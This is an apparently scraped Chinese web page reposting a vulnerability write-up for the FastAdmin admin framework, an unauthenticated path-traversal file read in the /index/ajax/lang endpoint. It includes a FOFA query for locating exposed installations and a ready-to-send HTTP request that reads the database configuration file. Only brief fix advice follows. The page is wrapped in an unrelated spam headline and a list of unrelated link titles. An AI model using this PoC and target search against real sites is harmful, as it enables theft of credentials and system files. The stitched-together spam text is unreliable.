当前位置: 首页 > news >正文

公司网站主要几方面怎么编辑网站代码

公司网站主要几方面,怎么编辑网站代码,网页设计结构,网站开发本地环境0x01 产品简介 FastAdmin是一款基于PHPBootstrap的开源后台框架,专为开发者精心打造。它基于ThinkPHP和Bootstrap两大主流技术构建,拥有完善的权限管理系统和一键生成CRUD等强大功能。FastAdmin致力于提高开发效率,降低开发成本,…

0x01 产品简介

FastAdmin是一款基于PHP+Bootstrap的开源后台框架,专为开发者精心打造。它基于ThinkPHP和Bootstrap两大主流技术构建,拥有完善的权限管理系统和一键生成CRUD等强大功能。FastAdmin致力于提高开发效率,降低开发成本,同时确保后台系统的稳定性和安全性。

0x02 漏洞概述

FastAdmin后台开发框架 /index/ajax/lang 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:

body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"

0x04 漏洞复现

PoC

GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

 读取数据库配置

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

http://www.yayakq.cn/news/935474/

相关文章:

  • 怎样做 网站的快捷链接php5mysql网站开发实例精讲
  • 东城网站设计北京网站开发的趋势在哪里
  • 免费的个人简历模板word下载优化电脑的软件有哪些
  • 深圳网站建站推广自己如何制作一个微信小程序
  • 如何备份网站视频制作用什么软件
  • 金华网站制作推广常州做网站设计
  • 网站地图怎么上传校园兼职网站开发用例图
  • 网站举报中心官网wordpress上不去了
  • 广东网站设计费用广告产品
  • 简述网站建设的概念官方网站建立
  • 网站服务内容有哪些网站建设实验报告格式
  • 网站开发的基础网站建设风险管理计划
  • 昆明做网站seo的wordpress第三方评论
  • 成都网站设计定制淄博建站哪家好
  • js判断是手机还是电脑访问网站韩国seocaso
  • 眼科医院网站设计怎么做6代理公司注册哪里好
  • 响水做网站价格银川网站开发公司电话
  • 网站内链建设和外链的推广页面设计美工
  • 建个人网站怎么赚钱深圳品牌防伪网
  • 网站开发人员分配注册公司流程和费用注册资金
  • 如何做一家类似携程的网站南通企业建站程序
  • 网站开发范本桂林设计单位资质升级网站
  • 手机网站吧建立小程序需要多少钱
  • 企业门户网站的建设费用最常用的网站推广方式
  • 外贸网站源码是什么2345网址导航 中国最
  • 苏州那家公司做网站好青岛知名网站建设多少钱
  • 邢台网站建设好蜘蛛百度大数据搜索引擎
  • 可以自己做网站不泉州全网营销推广
  • 公司网站建设入哪科目沧州百胜信息技术有限公司
  • 做pcr查基因序列的网站建筑公司网站的目标用户